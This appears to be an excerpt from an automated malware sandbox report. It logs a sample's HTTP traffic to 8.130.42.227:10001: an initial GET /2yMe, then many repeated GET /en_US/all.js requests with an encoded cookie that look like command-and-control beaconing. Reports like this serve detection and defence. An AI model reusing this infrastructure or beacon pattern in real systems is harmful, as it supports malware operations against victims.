            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: unknown
              TCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe
              Code function: 0_2_0099E3A0 _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,0_2_0099E3A0
            Source: global traffic
              HTTP traffic detected: GET /2yMe HTTP/1.1
                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)
                Host: 8.130.42.227:10001
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: global traffic
              HTTP traffic detected: GET /en_US/all.js HTTP/1.1
                Accept: */*
                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                Host: 8.130.42.227:10001
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
